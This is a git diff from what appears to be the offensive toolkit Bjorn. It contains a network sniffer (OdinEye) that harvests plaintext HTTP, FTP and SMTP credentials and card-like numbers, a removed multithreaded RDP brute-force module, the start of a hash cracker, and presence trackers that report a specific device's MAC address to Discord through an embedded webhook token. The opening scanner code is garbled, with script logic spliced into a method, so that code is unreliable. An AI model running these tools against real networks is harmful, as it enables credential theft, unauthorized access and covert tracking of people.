script_out = (port_info.get('script') or {}).get('vulners')
if script_out:
for cve in self.extract_cves(script_out):
vulns.append({
'port': port,
'service': service,
'vuln_id': cve,
'script': 'vulners',
'details': str(script_out)[:500]
})
except Exception:
pass
if __name__ == "__main__":
shared_data = SharedData()
return vulns
def _scan_heavy(self, ip: str, port_list: str) -> List[Dict]:
"""Ancienne stratégie (plus lente) avec catégorie vuln, etc."""
vulnerabilities: List[Dict] = []
vuln_scripts = [
'vuln','exploit','http-vuln-*','smb-vuln-*',
'ssl-*','ssh-*','ftp-vuln-*','mysql-vuln-*',
]
script_arg = ','.join(vuln_scripts)
args = f"-sV --script={script_arg} -T3 --script-timeout 20s"
logger.info(f"[HEAVY] nmap {ip} -p {port_list} ({args})")
try:
nmap_vuln_scanner = NmapVulnScanner(shared_data)
logger.info("Starting vulnerability scans...")
# Load the netkbfile and get the IPs to scan
ips_to_scan = shared_data.read_data() # Use your existing method to read the data
# Execute the scan on each IP with concurrency
with Progress(
TextColumn("[progress.description]{task.description}"),
BarColumn(),
"[progress.percentage]{task.percentage:>3.1f}%",
console=Console()
) as progress:
task = progress.add_task("Scanning vulnerabilities...", total=len(ips_to_scan))
futures = []
with ThreadPoolExecutor(max_workers=2) as executor: # Adjust the number of workers for RPi Zero
for row in ips_to_scan:
if row["Alive"] == '1': # Check if the host is alive
ip = row["IPs"]
futures.append(executor.submit(nmap_vuln_scanner.execute, ip, row, b_status))
for future in as_completed(futures):
progress.update(task, advance=1)
nmap_vuln_scanner.save_summary()
logger.info(f"Total scans performed: {len(nmap_vuln_scanner.scan_results)}")
exit(len(nmap_vuln_scanner.scan_results))
self.nm.scan(hosts=ip, ports=port_list, arguments=args)
except Exception as e:
logger.error(f"Error: {e}")
logger.error(f"Heavy scan failed to start: {e}")
return vulnerabilities
if ip in self.nm.all_hosts():
host = self.nm[ip]
discovered_ports: Set[str] = set()
for proto in host.all_protocols():
for port in host[proto].keys():
discovered_ports.add(str(port))
port_info = host[proto][port]
service = port_info.get('name', '') or ''
if 'script' in port_info:
for script_name, output in (port_info.get('script') or {}).items():
for cve in self.extract_cves(str(output)):
vulnerabilities.append({
'port': port,
'service': service,
'vuln_id': cve,
'script': script_name,
'details': str(output)[:500]
})
if bool(self.shared_data.config.get('scan_cpe', False)):
ports_for_cpe = list(discovered_ports) if discovered_ports else port_list.split(',')
cpes = self.scan_cpe(ip, ports_for_cpe[:10])
vulnerabilities.extend(cpes)
return vulnerabilities
# ---------------------------- Helpers -------------------------------- #
def _extract_cpe_values(self, port_info: Dict[str, Any]) -> List[str]:
"""Normalise tous les formats possibles de CPE renvoyés par python-nmap."""
cpe = port_info.get('cpe')
if not cpe:
return []
if isinstance(cpe, str):
parts = [x.strip() for x in cpe.splitlines() if x.strip()]
return parts or [cpe]
if isinstance(cpe, (list, tuple, set)):
return [str(x).strip() for x in cpe if str(x).strip()]
try:
return [str(cpe).strip()] if str(cpe).strip() else []
except Exception:
return []
def extract_cves(self, text: str) -> List[str]:
"""Extrait les identifiants CVE d'un texte."""
import re
if not text:
return []
cve_pattern = r'CVE-\d{4}-\d{4,7}'
return re.findall(cve_pattern, str(text), re.IGNORECASE)
def scan_cpe(self, ip: str, ports: List[str]) -> List[Dict]:
"""(Fallback lourd) Scan CPE détaillé si demandé."""
cpe_vulns: List[Dict] = []
try:
port_list = ','.join([str(p) for p in ports if str(p).strip()])
if not port_list:
return cpe_vulns
args = "-sV --version-all -T3 --max-retries 2 --host-timeout 45s"
logger.info(f"[CPE] nmap {ip} -p {port_list} ({args})")
self.nm.scan(hosts=ip, ports=port_list, arguments=args)
if ip in self.nm.all_hosts():
host = self.nm[ip]
for proto in host.all_protocols():
for port in host[proto].keys():
port_info = host[proto][port]
service = port_info.get('name', '') or ''
for cpe in self._extract_cpe_values(port_info):
cpe_vulns.append({
'port': port,
'service': service,
'vuln_id': f"CPE:{cpe}",
'script': 'version-scan',
'details': f"CPE detected: {cpe}"[:500]
})
except Exception as e:
logger.error(f"CPE scan error: {e}")
return cpe_vulns
# ---------------------------- Persistence ---------------------------- #
def save_vulnerabilities(self, mac: str, ip: str, findings: List[Dict]):
"""Sépare CPE et CVE, met à jour les statuts + enregistre les nouveautés."""
# Récupérer le hostname depuis la DB
hostname = None
try:
host_row = self.shared_data.db.query_one(
"SELECT hostnames FROM hosts WHERE mac_address=? LIMIT 1",
(mac,)
)
if host_row and host_row.get('hostnames'):
hostname = host_row['hostnames'].split(';')[0]
except Exception as e:
logger.debug(f"Could not fetch hostname: {e}")
# Grouper par port avec les infos complètes
findings_by_port = {}
for f in findings:
port = int(f.get('port', 0) or 0)
if port not in findings_by_port:
findings_by_port[port] = {
'cves': set(),
'cpes': set(),
'findings': []
}
findings_by_port[port]['findings'].append(f)
vid = str(f.get('vuln_id', ''))
if vid.upper().startswith('CVE-'):
findings_by_port[port]['cves'].add(vid)
elif vid.upper().startswith('CPE:'):
findings_by_port[port]['cpes'].add(vid.split(':', 1)[1])
elif vid.lower().startswith('cpe:'):
findings_by_port[port]['cpes'].add(vid)
# 1) Traiter les CVE par port
for port, data in findings_by_port.items():
if data['cves']:
for cve in data['cves']:
try:
existing = self.shared_data.db.query_one(
"SELECT id FROM vulnerabilities WHERE mac_address=? AND vuln_id=? AND port=? LIMIT 1",
(mac, cve, port)
)
if existing:
self.shared_data.db.execute("""
UPDATE vulnerabilities
SET ip=?, hostname=?, last_seen=CURRENT_TIMESTAMP, is_active=1
WHERE mac_address=? AND vuln_id=? AND port=?
""", (ip, hostname, mac, cve, port))
else:
self.shared_data.db.execute("""
INSERT INTO vulnerabilities(mac_address, ip, hostname, port, vuln_id, is_active)
VALUES(?,?,?,?,?,1)
""", (mac, ip, hostname, port, cve))
logger.debug(f"Saved CVE {cve} for {ip}:{port}")
except Exception as e:
logger.error(f"Failed to save CVE {cve}: {e}")
# 2) Traiter les CPE
for port, data in findings_by_port.items():
for cpe in data['cpes']:
try:
self.shared_data.db.add_detected_software(
mac_address=mac,
cpe=cpe,
ip=ip,
hostname=hostname,
port=port
)
except Exception as e:
logger.error(f"Failed to save CPE {cpe}: {e}")
logger.info(f"Saved vulnerabilities for {ip} ({mac}): {len(findings_by_port)} ports processed")

416
actions/odin_eye.py Normal file
View File

@@ -0,0 +1,416 @@
import os
try:
import psutil
except Exception:
psutil = None
def _list_net_ifaces() -> list[str]:
names = set()
# 1) psutil si dispo
if psutil:
try:
names.update(ifname for ifname in psutil.net_if_addrs().keys() if ifname != "lo")
except Exception:
pass
# 2) fallback kernel
try:
for n in os.listdir("/sys/class/net"):
if n and n != "lo":
names.add(n)
except Exception:
pass
out = ["auto"] + sorted(names)
# sécurité: pas de doublons
seen, unique = set(), []
for x in out:
if x not in seen:
unique.append(x); seen.add(x)
return unique
# Hook appelée par le backend avant affichage UI / sync DB
def compute_dynamic_b_args(base: dict) -> dict:
"""
Compute dynamic arguments at runtime.
Called by the web interface to populate dropdowns, etc.
"""
d = dict(base or {})
# Example: Dynamic interface list
if "interface" in d:
import psutil
interfaces = ["auto"]
try:
for ifname in psutil.net_if_addrs().keys():
if ifname != "lo":
interfaces.append(ifname)
except:
interfaces.extend(["wlan0", "eth0"])
d["interface"]["choices"] = interfaces
return d
# --- MÉTADONNÉES UI SUPPLÉMENTAIRES -----------------------------------------
# Exemples darguments (affichage frontend; aussi persisté en DB via sync_actions)
b_examples = [
{"interface": "auto", "filter": "http or ftp", "timeout": 120, "max_packets": 5000, "save_credentials": True},
{"interface": "wlan0", "filter": "(http or smtp) and not broadcast", "timeout": 300, "max_packets": 10000},
]
# Lien MD (peut être un chemin local servi par votre frontend, ou un http(s))
# Exemple: un README markdown stocké dans votre repo
b_docs_url = "docs/actions/OdinEye.md"
# --- Métadonnées d'action (consommées par shared.generate_actions_json) -----
b_class = "OdinEye"
b_module = "odin_eye" # nom du fichier sans .py
b_enabled = 0
b_action = "normal"
b_category = "recon"
b_name = "Odin Eye"
b_description = (
"Network traffic analyzer for capturing and analyzing data patterns and credentials.\n"
"Requires: tshark (sudo apt install tshark) + pyshark (pip install pyshark)."
)
b_author = "Fabien / Cyberviking"
b_version = "1.0.0"
b_icon = "OdinEye.png"
# Schéma d'arguments pour UI dynamique (clé == nom du flag sans '--')
b_args = {
"interface": {
"type": "select", "label": "Network Interface",
"choices": [], # <- Laisser vide: rempli dynamiquement par compute_dynamic_b_args(...)
"default": "auto",
"help": "Interface à écouter. 'auto' tente de détecter l'interface par défaut." },
"filter": {"type": "text", "label": "BPF Filter", "default": "(http or ftp or smtp or pop3 or imap or telnet) and not broadcast"},
"output": {"type": "text", "label": "Output dir", "default": "/home/bjorn/Bjorn/data/output/packets"},
"timeout": {"type": "number", "label": "Timeout (s)", "min": 10, "max": 36000, "step": 1, "default": 300},
"max_packets": {"type": "number", "label": "Max packets", "min": 100, "max": 2000000, "step": 100, "default": 10000},
}
# ----------------- Code d'analyse (ton code existant) -----------------------
import os, json, pyshark, argparse, logging, re, threading, signal
from datetime import datetime
from collections import defaultdict
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/output/packets"
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "odin_eye_settings.json")
DEFAULT_FILTER = "(http or ftp or smtp or pop3 or imap or telnet) and not broadcast"
CREDENTIAL_PATTERNS = {
'http': {
'username': [r'username=([^&]+)', r'user=([^&]+)', r'login=([^&]+)'],
'password': [r'password=([^&]+)', r'pass=([^&]+)']
},
'ftp': {
'username': [r'USER\s+(.+)', r'USERNAME\s+(.+)'],
'password': [r'PASS\s+(.+)']
},
'smtp': {
'auth': [r'AUTH\s+PLAIN\s+(.+)', r'AUTH\s+LOGIN\s+(.+)']
}
}
class OdinEye:
def __init__(self, interface, capture_filter=DEFAULT_FILTER, output_dir=DEFAULT_OUTPUT_DIR,
timeout=300, max_packets=10000):
self.interface = interface
self.capture_filter = capture_filter
self.output_dir = output_dir
self.timeout = timeout
self.max_packets = max_packets
self.capture = None
self.stop_capture = threading.Event()
self.statistics = defaultdict(int)
self.credentials = []
self.interesting_patterns = []
self.lock = threading.Lock()
def process_packet(self, packet):
try:
with self.lock:
self.statistics['total_packets'] += 1
if hasattr(packet, 'highest_layer'):
self.statistics[packet.highest_layer] += 1
if hasattr(packet, 'tcp'):
self.analyze_tcp_packet(packet)
except Exception as e:
logging.error(f"Error processing packet: {e}")
def analyze_tcp_packet(self, packet):
try:
if hasattr(packet, 'http'):
self.analyze_http_packet(packet)
elif hasattr(packet, 'ftp'):
self.analyze_ftp_packet(packet)
elif hasattr(packet, 'smtp'):
self.analyze_smtp_packet(packet)
if hasattr(packet.tcp, 'payload'):
self.analyze_payload(packet.tcp.payload)
except Exception as e:
logging.error(f"Error analyzing TCP packet: {e}")
def analyze_http_packet(self, packet):
try:
if hasattr(packet.http, 'request_uri'):
for field in ['username', 'password']:
for pattern in CREDENTIAL_PATTERNS['http'][field]:
matches = re.findall(pattern, packet.http.request_uri)
if matches:
with self.lock:
self.credentials.append({
'protocol': 'HTTP',
'type': field,
'value': matches[0],
'timestamp': datetime.now().isoformat(),
'source': packet.ip.src if hasattr(packet, 'ip') else None
})
except Exception as e:
logging.error(f"Error analyzing HTTP packet: {e}")
def analyze_ftp_packet(self, packet):
try:
if hasattr(packet.ftp, 'request_command'):
cmd = packet.ftp.request_command.upper()
if cmd in ['USER', 'PASS']:
with self.lock:
self.credentials.append({
'protocol': 'FTP',
'type': 'username' if cmd == 'USER' else 'password',
'value': packet.ftp.request_arg,
'timestamp': datetime.now().isoformat(),
'source': packet.ip.src if hasattr(packet, 'ip') else None
})
except Exception as e:
logging.error(f"Error analyzing FTP packet: {e}")
def analyze_smtp_packet(self, packet):
try:
if hasattr(packet.smtp, 'command_line'):
for pattern in CREDENTIAL_PATTERNS['smtp']['auth']:
matches = re.findall(pattern, packet.smtp.command_line)
if matches:
with self.lock:
self.credentials.append({
'protocol': 'SMTP',
'type': 'auth',
'value': matches[0],
'timestamp': datetime.now().isoformat(),
'source': packet.ip.src if hasattr(packet, 'ip') else None
})
except Exception as e:
logging.error(f"Error analyzing SMTP packet: {e}")
def analyze_payload(self, payload):
patterns = {
'email': r'[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}',
'credit_card': r'\b\d{4}[- ]?\d{4}[- ]?\d{4}[- ]?\d{4}\b',
'ip_address': r'\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b'
}
for name, pattern in patterns.items():
matches = re.findall(pattern, payload)
if matches:
with self.lock:
self.interesting_patterns.append({
'type': name,
'value': matches[0],
'timestamp': datetime.now().isoformat()
})
def save_results(self):
try:
os.makedirs(self.output_dir, exist_ok=True)
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
stats_file = os.path.join(self.output_dir, f"capture_stats_{timestamp}.json")
with open(stats_file, 'w') as f:
json.dump(dict(self.statistics), f, indent=4)
if self.credentials:
creds_file = os.path.join(self.output_dir, f"credentials_{timestamp}.json")
with open(creds_file, 'w') as f:
json.dump(self.credentials, f, indent=4)
if self.interesting_patterns:
patterns_file = os.path.join(self.output_dir, f"patterns_{timestamp}.json")
with open(patterns_file, 'w') as f:
json.dump(self.interesting_patterns, f, indent=4)
logging.info(f"Results saved to {self.output_dir}")
except Exception as e:
logging.error(f"Failed to save results: {e}")
def execute(self):
try:
# Timeout thread (inchangé) ...
if self.timeout and self.timeout > 0:
def _stop_after():
self.stop_capture.wait(self.timeout)
self.stop_capture.set()
threading.Thread(target=_stop_after, daemon=True).start()
logging.info(...)
self.capture = pyshark.LiveCapture(interface=self.interface, bpf_filter=self.capture_filter)
# Interruption douce — SKIP si on tourne en mode importlib (thread)
if os.environ.get("BJORN_EMBEDDED") != "1":
try:
signal.signal(signal.SIGINT, self.handle_interrupt)
signal.signal(signal.SIGTERM, self.handle_interrupt)
except Exception:
# Ex: ValueError si pas dans le main thread
pass
for packet in self.capture.sniff_continuously():
if self.stop_capture.is_set() or self.statistics['total_packets'] >= self.max_packets:
break
self.process_packet(packet)
except Exception as e:
logging.error(f"Capture error: {e}")
finally:
self.cleanup()
def handle_interrupt(self, signum, frame):
self.stop_capture.set()
def cleanup(self):
if self.capture:
self.capture.close()
self.save_results()
logging.info("Capture completed")
def save_settings(interface, capture_filter, output_dir, timeout, max_packets):
try:
os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
settings = {
"interface": interface,
"capture_filter": capture_filter,
"output_dir": output_dir,
"timeout": timeout,
"max_packets": max_packets
}
with open(SETTINGS_FILE, 'w') as f:
json.dump(settings, f)
logging.info(f"Settings saved to {SETTINGS_FILE}")
except Exception as e:
logging.error(f"Failed to save settings: {e}")
def load_settings():
if os.path.exists(SETTINGS_FILE):
try:
with open(SETTINGS_FILE, 'r') as f:
return json.load(f)
except Exception as e:
logging.error(f"Failed to load settings: {e}")
return {}
def main():
parser = argparse.ArgumentParser(description="OdinEye: network traffic analyzer & credential hunter")
parser.add_argument("-i", "--interface", required=False, help="Network interface to monitor")
parser.add_argument("-f", "--filter", default=DEFAULT_FILTER, help="BPF capture filter")
parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory")
parser.add_argument("-t", "--timeout", type=int, default=300, help="Capture timeout in seconds")
parser.add_argument("-m", "--max-packets", type=int, default=10000, help="Maximum packets to capture")
args = parser.parse_args()
settings = load_settings()
interface = args.interface or settings.get("interface")
capture_filter = args.filter or settings.get("capture_filter", DEFAULT_FILTER)
output_dir = args.output or settings.get("output_dir", DEFAULT_OUTPUT_DIR)
timeout = args.timeout or settings.get("timeout", 300)
max_packets = args.max_packets or settings.get("max_packets", 10000)
if not interface:
logging.error("Interface is required. Use -i or set it in settings")
return
save_settings(interface, capture_filter, output_dir, timeout, max_packets)
analyzer = OdinEye(interface, capture_filter, output_dir, timeout, max_packets)
analyzer.execute()
if __name__ == "__main__":
main()
"""
# action_template.py
# Example template for a Bjorn action with Neo launcher support
# UI Metadata
b_class = "MyAction"
b_module = "my_action"
b_enabled = 1
b_action = "normal" # normal, aggressive, stealth
b_description = "Description of what this action does"
# Arguments schema for UI
b_args = {
"target": {
"type": "text",
"label": "Target IP/Host",
"default": "192.168.1.1",
"placeholder": "Enter target",
"help": "The target to scan"
},
"port": {
"type": "number",
"label": "Port",
"default": 80,
"min": 1,
"max": 65535
},
"protocol": {
"type": "select",
"label": "Protocol",
"choices": ["tcp", "udp"],
"default": "tcp"
},
"verbose": {
"type": "checkbox",
"label": "Verbose output",
"default": False
},
"timeout": {
"type": "slider",
"label": "Timeout (seconds)",
"min": 10,
"max": 300,
"step": 10,
"default": 60
}
}
def compute_dynamic_b_args(base: dict) -> dict:
# Compute dynamic values at runtime
return base
import argparse
import sys
def main():
parser = argparse.ArgumentParser(description=b_description)
parser.add_argument('--target', default=b_args['target']['default'])
parser.add_argument('--port', type=int, default=b_args['port']['default'])
parser.add_argument('--protocol', choices=b_args['protocol']['choices'],
default=b_args['protocol']['default'])
parser.add_argument('--verbose', action='store_true')
parser.add_argument('--timeout', type=int, default=b_args['timeout']['default'])
args = parser.parse_args()
# Your action logic here
print(f"Starting action with target: {args.target}")
# ...
if __name__ == "__main__":
main()
"""

82
actions/presence_join.py Normal file
View File

@@ -0,0 +1,82 @@
# actions/presence_join.py
# -*- coding: utf-8 -*-
"""
PresenceJoin — Sends a Discord webhook when the targeted host JOINS the network.
- Triggered by the scheduler ONLY on transition OFF->ON (b_trigger="on_join").
- Targeting via b_requires (e.g. {"any":[{"mac_is":"AA:BB:..."}]}).
- The action does not query anything: it only notifies when called.
"""
import requests
from typing import Optional
import logging
from datetime import datetime, timezone
from logger import Logger
from shared import SharedData # only if executed directly for testing
logger = Logger(name="PresenceJoin", level=logging.DEBUG)
# --- Metadata (truth is in DB; here for reference/consistency) --------------
b_class = "PresenceJoin"
b_module = "presence_join"
b_status = "PresenceJoin"
b_port = None
b_service = None
b_parent = None
b_priority = 90
b_cooldown = 0 # not needed: on_join only fires on join transition
b_rate_limit = None
b_trigger = "on_join" # <-- Host JOINED the network (OFF -> ON since last scan)
b_requires = {"any":[{"mac_is":"60:57:c8:51:63:fb"}]} # adapt as needed
# Replace with your webhook
DISCORD_WEBHOOK_URL = "https://discordapp.com/api/webhooks/1416433823456956561/MYc2mHuqgK_U8tA96fs2_-S1NVchPzGOzan9EgLr4i8yOQa-3xJ6Z-vMejVrpPfC3OfD"
class PresenceJoin:
def __init__(self, shared_data):
self.shared_data = shared_data
def _send(self, text: str) -> None:
if not DISCORD_WEBHOOK_URL or "webhooks/" not in DISCORD_WEBHOOK_URL:
logger.error("PresenceJoin: DISCORD_WEBHOOK_URL missing/invalid.")
return
try:
r = requests.post(DISCORD_WEBHOOK_URL, json={"content": text}, timeout=6)
if r.status_code < 300:
logger.info("PresenceJoin: webhook sent.")
else:
logger.error(f"PresenceJoin: HTTP {r.status_code}: {r.text}")
except Exception as e:
logger.error(f"PresenceJoin: webhook error: {e}")
def execute(self, ip: Optional[str], port: Optional[str], row: dict, status_key: str):
"""
Called by the orchestrator when the scheduler detected the join.
ip/port = host targets (if known), row = host info.
"""
try:
mac = row.get("MAC Address") or row.get("mac_address") or "MAC"
host = row.get("hostname") or (row.get("hostnames") or "").split(";")[0] if row.get("hostnames") else None
name = f"{host} ({mac})" if host else mac
ip_s = (ip or (row.get("IPs") or "").split(";")[0] or "").strip()
# Add timestamp in UTC
timestamp = datetime.now(timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
msg = f"✅ **Presence detected**\n"
msg += f"- Host: {host or 'unknown'}\n"
msg += f"- MAC: {mac}\n"
if ip_s:
msg += f"- IP: {ip_s}\n"
msg += f"- Time: {timestamp}"
self._send(msg)
return "success"
except Exception as e:
logger.error(f"PresenceJoin error: {e}")
return "failed"
if __name__ == "__main__":
sd = SharedData()
logger.info("PresenceJoin ready (direct mode).")

82
actions/presence_left.py Normal file
View File

@@ -0,0 +1,82 @@
# actions/presence_left.py
# -*- coding: utf-8 -*-
"""
PresenceLeave — Sends a Discord webhook when the targeted host LEAVES the network.
- Triggered by the scheduler ONLY on transition ON->OFF (b_trigger="on_leave").
- Targeting via b_requires (e.g. {"any":[{"mac_is":"AA:BB:..."}]}).
- The action does not query anything: it only notifies when called.
"""
import requests
from typing import Optional
import logging
from datetime import datetime, timezone
from logger import Logger
from shared import SharedData # only if executed directly for testing
logger = Logger(name="PresenceLeave", level=logging.DEBUG)
# --- Metadata (truth is in DB; here for reference/consistency) --------------
b_class = "PresenceLeave"
b_module = "presence_left"
b_status = "PresenceLeave"
b_port = None
b_service = None
b_parent = None
b_priority = 90
b_cooldown = 0 # not needed: on_leave only fires on leave transition
b_rate_limit = None
b_trigger = "on_leave" # <-- Host LEFT the network (ON -> OFF since last scan)
b_requires = {"any":[{"mac_is":"60:57:c8:51:63:fb"}]} # adapt as needed
b_enabled = 1
# Replace with your webhook (can reuse the same as PresenceJoin)
DISCORD_WEBHOOK_URL = "https://discordapp.com/api/webhooks/1416433823456956561/MYc2mHuqgK_U8tA96fs2_-S1NVchPzGOzan9EgLr4i8yOQa-3xJ6Z-vMejVrpPfC3OfD"
class PresenceLeave:
def __init__(self, shared_data):
self.shared_data = shared_data
def _send(self, text: str) -> None:
if not DISCORD_WEBHOOK_URL or "webhooks/" not in DISCORD_WEBHOOK_URL:
logger.error("PresenceLeave: DISCORD_WEBHOOK_URL missing/invalid.")
return
try:
r = requests.post(DISCORD_WEBHOOK_URL, json={"content": text}, timeout=6)
if r.status_code < 300:
logger.info("PresenceLeave: webhook sent.")
else:
logger.error(f"PresenceLeave: HTTP {r.status_code}: {r.text}")
except Exception as e:
logger.error(f"PresenceLeave: webhook error: {e}")
def execute(self, ip: Optional[str], port: Optional[str], row: dict, status_key: str):
"""
Called by the orchestrator when the scheduler detected the disconnection.
ip/port = last known target (if available), row = host info.
"""
try:
mac = row.get("MAC Address") or row.get("mac_address") or "MAC"
host = row.get("hostname") or (row.get("hostnames") or "").split(";")[0] if row.get("hostnames") else None
ip_s = (ip or (row.get("IPs") or "").split(";")[0] or "").strip()
# Add timestamp in UTC
timestamp = datetime.now(timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
msg = f"❌ **Presence lost**\n"
msg += f"- Host: {host or 'unknown'}\n"
msg += f"- MAC: {mac}\n"
if ip_s:
msg += f"- Last IP: {ip_s}\n"
msg += f"- Time: {timestamp}"
self._send(msg)
return "success"
except Exception as e:
logger.error(f"PresenceLeave error: {e}")
return "failed"
if __name__ == "__main__":
sd = SharedData()
logger.info("PresenceLeave ready (direct mode).")

View File

@@ -1,198 +0,0 @@
"""
rdp_connector.py - This script performs a brute force attack on RDP services (port 3389) to find accessible accounts using various user credentials. It logs the results of successful connections.
"""
import os
import pandas as pd
import subprocess
import threading
import logging
import time
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, SpinnerColumn
from queue import Queue
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="rdp_connector.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "RDPBruteforce"
b_module = "rdp_connector"
b_status = "brute_force_rdp"
b_port = 3389
b_parent = None
class RDPBruteforce:
"""
Class to handle the RDP brute force process.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.rdp_connector = RDPConnector(shared_data)
logger.info("RDPConnector initialized.")
def bruteforce_rdp(self, ip, port):
"""
Run the RDP brute force attack on the given IP and port.
"""
logger.info(f"Running bruteforce_rdp on {ip}:{port}...")
return self.rdp_connector.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""
Execute the brute force attack and update status.
"""
logger.info(f"Executing RDPBruteforce on {ip}:{port}...")
self.shared_data.bjornorch_status = "RDPBruteforce"
success, results = self.bruteforce_rdp(ip, port)
return 'success' if success else 'failed'
class RDPConnector:
"""
Class to manage the connection attempts and store the results.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.scan = pd.read_csv(shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("3389", na=False)]
self.users = open(shared_data.usersfile, "r").read().splitlines()
self.passwords = open(shared_data.passwordsfile, "r").read().splitlines()
self.lock = threading.Lock()
self.rdpfile = shared_data.rdpfile
# If the file doesn't exist, it will be created
if not os.path.exists(self.rdpfile):
logger.info(f"File {self.rdpfile} does not exist. Creating...")
with open(self.rdpfile, "w") as f:
f.write("MAC Address,IP Address,Hostname,User,Password,Port\n")
self.results = [] # List to store results temporarily
self.queue = Queue()
self.console = Console()
def load_scan_file(self):
"""
Load the netkb file and filter it for RDP ports.
"""
self.scan = pd.read_csv(self.shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("3389", na=False)]
def rdp_connect(self, adresse_ip, user, password):
"""
Attempt to connect to an RDP service using the given credentials.
"""
command = f"xfreerdp /v:{adresse_ip} /u:{user} /p:{password} /cert:ignore +auth-only"
try:
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
if process.returncode == 0:
return True
else:
return False
except subprocess.SubprocessError as e:
return False
def worker(self, progress, task_id, success_flag):
"""
Worker thread to process items in the queue.
"""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
if self.rdp_connect(adresse_ip, user, password):
with self.lock:
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials for IP: {adresse_ip} | User: {user} | Password: {password}")
self.save_results()
self.removeduplicates()
success_flag[0] = True
self.queue.task_done()
progress.update(task_id, advance=1)
def run_bruteforce(self, adresse_ip, port):
self.load_scan_file() # Reload the scan file to get the latest IPs and ports
total_tasks = len(self.users) * len(self.passwords)
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
success_flag = [False]
threads = []
with Progress(SpinnerColumn(), TextColumn("[progress.description]{task.description}"), BarColumn(), TextColumn("[progress.percentage]{task.percentage:>3.0f}%")) as progress:
task_id = progress.add_task("[cyan]Bruteforcing RDP...", total=total_tasks)
mac_address = self.scan.loc[self.scan['IPs'] == adresse_ip, 'MAC Address'].values[0]
hostname = self.scan.loc[self.scan['IPs'] == adresse_ip, 'Hostnames'].values[0]
for _ in range(40): # Adjust the number of threads based on the RPi Zero's capabilities
t = threading.Thread(target=self.worker, args=(progress, task_id, success_flag))
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
self.queue.get()
self.queue.task_done()
break
self.queue.join()
for t in threads:
t.join()
return success_flag[0], self.results # Return True and the list of successes if at least one attempt was successful
def save_results(self):
"""
Save the results of successful connection attempts to a CSV file.
"""
df = pd.DataFrame(self.results, columns=['MAC Address', 'IP Address', 'Hostname', 'User', 'Password', 'Port'])
df.to_csv(self.rdpfile, index=False, mode='a', header=not os.path.exists(self.rdpfile))
self.results = [] # Reset temporary results after saving
def removeduplicates(self):
"""
Remove duplicate entries from the results CSV file.
"""
df = pd.read_csv(self.rdpfile)
df.drop_duplicates(inplace=True)
df.to_csv(self.rdpfile, index=False)
if __name__ == "__main__":
shared_data = SharedData()
try:
rdp_bruteforce = RDPBruteforce(shared_data)
logger.info("Démarrage de l'attaque RDP... sur le port 3389")
# Load the netkb file and get the IPs to scan
ips_to_scan = shared_data.read_data()
# Execute the brute force on each IP
for row in ips_to_scan:
ip = row["IPs"]
logger.info(f"Executing RDPBruteforce on {ip}...")
rdp_bruteforce.execute(ip, b_port, row, b_status)
logger.info(f"Nombre total de succès: {len(rdp_bruteforce.rdp_connector.results)}")
exit(len(rdp_bruteforce.rdp_connector.results))
except Exception as e:
logger.error(f"Erreur: {e}")

265
actions/rune_cracker.py Normal file
View File

@@ -0,0 +1,265 @@
# Advanced password cracker supporting multiple hash formats and attack methods.
# Saves settings in `/home/bjorn/.settings_bjorn/rune_cracker_settings.json`.
# Automatically loads saved settings if arguments are not provided.
# -i, --input Input file containing hashes to crack.
# -w, --wordlist Path to password wordlist (default: built-in list).
# -r, --rules Path to rules file for mutations (default: built-in rules).
# -t, --type Hash type (md5, sha1, sha256, sha512, ntlm).
# -o, --output Output directory (default: /home/bjorn/Bjorn/data/output/hashes).
import os
import json
import hashlib
import argparse
from datetime import datetime
import logging
import threading
from concurrent.futures import ThreadPoolExecutor
import itertools
import re
b_class = "RuneCracker"
b_module = "rune_cracker"
b_enabled = 0
# Configure logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
# Default settings
DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/output/hashes"
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "rune_cracker_settings.json")
# Supported hash types and their patterns
HASH_PATTERNS = {
'md5': r'^[a-fA-F0-9]{32}$',
'sha1': r'^[a-fA-F0-9]{40}$',
'sha256': r'^[a-fA-F0-9]{64}$',
'sha512': r'^[a-fA-F0-9]{128}$',
'ntlm': r'^[a-fA-F0-9]{32}$'
}
class RuneCracker:
def __init__(self, input_file, wordlist=None, rules=None, hash_type=None, output_dir=DEFAULT_OUTPUT_DIR):
self.input_file = input_file
